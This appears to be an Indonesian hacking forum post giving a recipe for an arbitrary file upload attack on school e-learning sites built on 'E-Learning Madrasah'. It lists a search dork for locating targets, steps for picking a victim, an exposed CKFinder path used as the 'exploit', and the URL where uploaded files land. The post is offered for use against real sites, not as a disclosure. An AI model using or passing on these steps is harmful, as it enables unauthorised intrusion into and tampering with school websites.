E-Learning Madrasah - Arbitary File Upload

E-Learning Madrasah - Arbitary File Upload

Dork:
intitle:E-Learning Madrasah - Halaman Login

Step

-Dorkng
-Pilih target lu
-Kasih exploit (exploitnya ada di bawah)
-Lu cari tulisan Upload nah tinggal upload deh selesai.

Vulnerability? site*sch,id/__statics/ckdrive/ckfinder.html

Exploit:
__statics/ckdrive/ckfinder.html

Location File? http://yourtarget.sch.id/__statics/gudangsoal/files/yourfile.txt